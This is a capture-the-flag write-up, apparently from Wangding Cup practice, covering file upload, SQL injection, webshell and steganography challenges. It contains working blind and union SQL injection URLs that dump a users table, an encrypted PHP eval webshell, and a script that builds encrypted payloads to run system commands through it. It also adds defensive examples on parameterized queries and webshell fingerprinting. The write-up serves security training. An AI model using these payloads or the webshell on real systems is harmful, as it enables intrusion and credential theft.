WEB01
File upload

http://0192c6a5ded67282a36b8e62b3ac6731.3ljw.dg07.wangdingcup.com:43005/upload.php

Get the flag.
web02

http://0192c6b07da1728495c1bb5050f26fb6.bcyz.dg05.wangdingcup.com:43014/OA_announcement.php?id=1%20and%201%20=1

This shows that a SQL injection vulnerability exists.

http://0192c6b07da1728495c1bb5050f26fb6.bcyz.dg05.wangdingcup.com:43014/OA_announcement.php?id=1+order+by+4

Get the length of the database name:

http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20%20length(database())%3E13%20--+
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20%20length(database())%3E14%20--+

So the database name is 14 characters long:

http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20%20length(database())=14%20--+

Get the database name
Blind injection, one character at a time:

http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20(ascii(substr(database(),1,1))=77)%20--+
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20(ascii(substr(database(),2,1))=111)%20--+
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=1%20and%20(ascii(substr(database(),3,1))=122)%20--+

Database name: Mozhe_OAsystem
Union injection

http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,2,database(),4%20--+

http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27Mozhe_OAsystem%27%20--+
OA_Users,cms,ua
http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27OA_Users%27%20--+
id,OAname,PassWord,Status

http://0192c6c827887285a1fd1f0b67aa4d50.lnd7.dg03.wangdingcup.com:43006/OA_announcement.php?id=-1%20union%20select%201,group_concat(concat_ws(%27-%27,OAname,PassWord)),3,4%20from%20OA_Users%20--+

Crack the password, log in as that user and get the flag:
wdflag{qsbvaxnwvwakwhgec3gq8y8b0q68twae}
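To show why the web02 probes above work and what closes the hole, here is an added example (not code from the writeup or from the challenge application). It assumes an in-memory SQLite table named after the writeup's OA_announcement with four columns; the rows are constructed sample data, and the vulnerable handler is a guess at the bug class, not the challenge's real source. It contrasts string-spliced SQL with a bound parameter plus an up-front type check, using the same probe shapes the writeup sends.

```python
import sqlite3

# Constructed sample schema. Table and column count follow the writeup
# (four columns, which is why "order by 4" succeeded there); rows are made up.
SCHEMA = """
CREATE TABLE OA_announcement(id INTEGER, title TEXT, body TEXT, author TEXT);
INSERT INTO OA_announcement VALUES (1, 'Welcome', 'First notice', 'admin');
INSERT INTO OA_announcement VALUES (2, 'Maintenance', 'Second notice', 'ops');
"""

def open_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def lookup_vulnerable(conn, id_param: str) -> list:
    """The bug class behind web02: the request parameter is spliced into SQL text."""
    sql = "SELECT id, title, body, author FROM OA_announcement WHERE id=" + id_param
    return conn.execute(sql).fetchall()

def lookup_bound_only(conn, id_param: str) -> list:
    """Binding alone: the value is passed as data, so 'and 1=1' never reaches the parser."""
    sql = "SELECT id, title, body, author FROM OA_announcement WHERE id=?"
    return conn.execute(sql, (id_param,)).fetchall()

def lookup_parameterized(conn, id_param: str) -> list:
    """Preferred fix: reject anything that is not an integer, then bind it."""
    if not id_param.isdigit():
        raise ValueError("id must be a non-negative integer")
    sql = "SELECT id, title, body, author FROM OA_announcement WHERE id=?"
    return conn.execute(sql, (int(id_param),)).fetchall()

def demo() -> dict:
    conn = open_db()
    out = {}
    # Boolean-based probes shaped like the writeup's "1 and 1=1": the response differs
    # with the truth of the injected condition, which is the blind-SQLi oracle.
    out["vuln_true"] = len(lookup_vulnerable(conn, "1 and 1=1"))
    out["vuln_false"] = len(lookup_vulnerable(conn, "1 and 1=2"))
    # Union probe shaped like the writeup's "-1 union select 1,2,3,4": an attacker-chosen
    # row is rendered where a real announcement would be.
    out["vuln_union"] = lookup_vulnerable(conn, "-1 union select 1,2,3,4")
    # With a bound parameter the probe is compared as a literal string and matches nothing,
    # so the oracle disappears; a plain "1" still works.
    out["bound_probe"] = len(lookup_bound_only(conn, "1 and 1=1"))
    out["bound_plain"] = len(lookup_bound_only(conn, "1"))
    # With validation the probes never reach the database at all.
    out["param_plain"] = len(lookup_parameterized(conn, "1"))
    for probe in ("1 and 1=2", "-1 union select 1,2,3,4"):
        try:
            lookup_parameterized(conn, probe)
            out[probe] = "accepted"
        except ValueError:
            out[probe] = "rejected"
    return out

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The target in the writeup is MySQL (it uses `database()` and `information_schema`), but the splice-versus-bind contrast is identical on any SQL engine; SQLite is used here only so the example runs offline.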
web03
First, the challenge description says the system has already been backed up, so a backup file must exist.
Extracting it yields a large pile of PHP files.
Pull out the PHP file names and batch-request them with yakit; the one file that returns output is describedssTest.php:
```php
<?php
error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';   // value compared against md5($_GET['id'])
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';   // encrypted callable name
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';   // encrypted payload
$v8 = '0329647546905494';   // fixed AES-CBC IV
// e(): AES-128-CBC encrypt, prefix the IV, then base64-encode twice
function e($D, $K) {
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'].$encrypted);
    $result = base64_encode($result);
    return $result;
}
// d(): reverse of e(): base64-decode twice, drop the IV prefix, decrypt
function d($D, $K) {
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}
$a8 = trim(d($a8, $p8));   // decrypt to a function name
ob_start();
$a8(trim(d($d8, $p8)));    // call it with the decrypted payload, capturing its output
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);           // send the output back encrypted the same way
?>
```
Decrypt the data in $d8:

```php
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function decryptData($data, $key, $iv) {
    $decodedData = base64_decode(base64_decode($data));
    $encryptedData = substr($decodedData, 16); // 16 is the IV length
    return openssl_decrypt($encryptedData, 'aes-128-cbc', $key, 0, $iv);
}
// decrypt $a8 and $d8
$decrypted_a8 = decryptData($a8, $p8, $v8);
$decrypted_d8 = decryptData($d8, $p8, $v8);
echo "decrypted a8: " . $decrypted_a8 . "\n";
echo "decrypted d8: " . $decrypted_d8 . "\n";
?>
```
The decrypted string is an eval call: @eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
$p8 = "3b7430adaed18facca7b799229138b7b" is MD5 applied twice, but the if condition applies MD5 only once.
First reverse 3b7430adaed18facca7b799229138b7b, which gives 20241026; then MD5 20241026 on cmd5, which gives 04c50eb4bc04c76311d03550ee2c1b71.
When the inner eval runs, the POST value is first passed through d(), so the payload must be produced with the matching encryption:

@eval(trim(d(\$_POST['d'],\$p8)));}
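For an analyst who finds a file like describedssTest.php during incident triage, the following added example (not code from the writeup or the challenge) characterises the e()/d() wrapper offline, using only the Python standard library, so it never decrypts the AES payload. It strips the two base64 layers exactly as d() does, checks that the embedded IV matches $v8, and reports how many AES blocks each blob holds, which is enough to fingerprint the wrapper and size its payload without running any of it. It also re-implements the md5 gate as the writeup describes it (p8 assumed to be MD5 applied twice to a date string) so the claim can be verified locally. The constants are copied from the shell source above; lenient base64 decoding mirrors PHP's non-strict base64_decode.

```python
import base64
import hashlib

V8 = b"0329647546905494"                        # IV hard-coded in the shell
P8 = "3b7430adaed18facca7b799229138b7b"        # value compared against md5($_GET['id'])
A8 = "TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0="
D8 = "TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09"

def peel(blob: str) -> tuple:
    """Reverse the e() wrapper base64(base64(IV . base64(ct))) and return (iv, ciphertext).
    Non-alphabet bytes are dropped, as PHP's non-strict base64_decode does."""
    middle = base64.b64decode(blob)              # outer base64 layer
    inner = base64.b64decode(middle)             # second layer: IV followed by base64 ciphertext
    iv, ct_b64 = inner[:16], inner[16:]          # d() also does substr(..., 16)
    return iv, base64.b64decode(ct_b64)          # openssl_decrypt(options=0) expects base64 input

def describe(blob: str) -> dict:
    """Structural facts an analyst can check without the key or an AES library."""
    iv, ct = peel(blob)
    return {
        "iv_matches_v8": iv == V8,
        "cipher_bytes": len(ct),
        "block_aligned": len(ct) % 16 == 0,      # CBC output is always whole 16-byte blocks
        "aes_blocks": len(ct) // 16,             # an upper bound on payload size (PKCS#7 padding)
    }

def gate_passes(candidate_id: str, p8: str = P8) -> bool:
    """The shell's gate is md5($_GET['id']) === $p8; same test, offline."""
    return hashlib.md5(candidate_id.encode()).hexdigest() == p8

def seed_fits_double_md5(seed: str, p8: str = P8) -> bool:
    """The writeup says p8 is MD5 applied twice to a date string, so md5(seed) would be the
    id the gate accepts. Returns whether a candidate seed fits that chain."""
    return gate_passes(hashlib.md5(seed.encode()).hexdigest(), p8)

if __name__ == "__main__":
    for name, blob in (("a8", A8), ("d8", D8)):
        print(name, describe(blob))
    print("seed 20241026 fits the double-MD5 chain:", seed_fits_double_md5("20241026"))
```

A single-block $a8 is consistent with a short function name, and a multi-block $d8 with the eval wrapper the writeup decrypted; the recurring pattern (double base64, fixed IV, `openssl_decrypt`, variable function call, output buffering, encrypted reply) is what a file-integrity or webshell scanner should key on rather than the specific constants.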
Build a PHP encryption script to generate the encrypted payload that reads the flag:

```php
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
// same e() as in the shell: AES-128-CBC, IV prefix, base64 twice
function e($D, $K) {
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'].$encrypted);
    $result = base64_encode($result);
    return $result;
}
$codeToExecute = 'system("cat ../../../../flag.txt");';
$encryptedData = e($codeToExecute, $p8);
echo $encryptedData;
?>
```
Decrypt the response:

```php
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVORmRSYWxWTlQwUjZaR3BHZEVsd01YQkdWSGRKUkdsVFJXSlplVE13VWtGTU5IWXpZa1JHUWpOYVdVWm9iRFpwWkdFNFF5dGhORTFVVnl0U2VtaFVhVVE9';
function decryptData($data, $key, $iv) {
    $decodedData = base64_decode(base64_decode($data));
    $encryptedData = substr($decodedData, 16); // 16 is the IV length
    return openssl_decrypt($encryptedData, 'aes-128-cbc', $key, 0, $iv);
}
// decrypt the encrypted response returned by the shell
$decrypted_d8 = decryptData($d8, $p8, $v8);
echo "decrypted d8: " . $decrypted_d8 . "\n";
?>
```
MISC01
Search for "password".
CRYPTO01
CRYPTO02
Open the image in 010 Editor: at the very end of the file there is a base64-encoded string:

d2RmbGFne2RlNjA1YTM3NDZmZGM5MTl9

Decode it to get the flag.
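The CRYPTO02 trick is data appended after the image's terminal marker, which viewers ignore. As an added example (not code from the writeup), here is a small carver that finds that trailer in PNG (after the IEND chunk) or JPEG (after the EOI marker) and decodes it when it is base64 text. The image is constructed in the block (a minimal PNG skeleton) and the trailer is the base64 string from the writeup; the JPEG branch and the one-byte-per-pixel IHDR are assumptions for the sample, not details of the challenge file.

```python
import base64
import binascii
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"

def png_chunk(ctype: bytes, data: bytes = b"") -> bytes:
    """Build one PNG chunk: 4-byte length, type, data, CRC32 over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def trailer(image: bytes) -> bytes:
    """Bytes after the format's terminal marker: IEND chunk (PNG) or EOI (JPEG)."""
    if image.startswith(PNG_SIG):
        idx = image.find(b"IEND")
        if idx == -1:
            raise ValueError("PNG without IEND chunk")
        return image[idx + 4 + 4:]               # past the chunk type and its 4-byte CRC
    if image.startswith(JPEG_SOI):
        # First EOI after the header. An embedded EXIF thumbnail carries its own EOI,
        # so on real files confirm the offset against a proper segment walk.
        idx = image.find(JPEG_EOI)
        if idx == -1:
            raise ValueError("JPEG without EOI marker")
        return image[idx + 2:]
    raise ValueError("unsupported image format")

def decode_base64_text(data: bytes):
    """Decoded bytes if the trailer is plain base64 text, otherwise None."""
    text = b"".join(data.split())                # tolerate line breaks around the blob
    if not text:
        return None
    try:
        return base64.b64decode(text, validate=True)
    except (binascii.Error, ValueError):
        return None

def carve(image: bytes) -> dict:
    """Summarise what follows the image: raw trailer length, the bytes, and their decoding."""
    raw = trailer(image)
    return {"trailer_len": len(raw), "trailer": raw, "decoded": decode_base64_text(raw)}

# Constructed sample: 1x1 greyscale PNG skeleton (IHDR + IEND; no IDAT is needed for
# the carve) followed by the base64 string found at the end of the CRYPTO02 image.
CLEAN_PNG = (PNG_SIG
             + png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
             + png_chunk(b"IEND"))
SAMPLE_PNG = CLEAN_PNG + b"d2RmbGFne2RlNjA1YTM3NDZmZGM5MTl9"

if __name__ == "__main__":
    print(carve(SAMPLE_PNG))
```

A non-empty trailer on a production image is itself a finding: legitimate encoders stop at IEND/EOI, so a `trailer_len` greater than zero is a cheap first-pass check for appended payloads whether or not they decode as base64.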
Challenge files:
Shared via Baidu Netdisk: 第四届“网鼎杯”网络安全大赛赛前模拟训练.7z
Link: https://pan.baidu.com/s/1DLMba8MDs44eHHKNQU5Gwg?pwd=pbqz
There is also a WeChat group for technical discussion and casual chat: scan the QR code below and add me as a friend to be invited.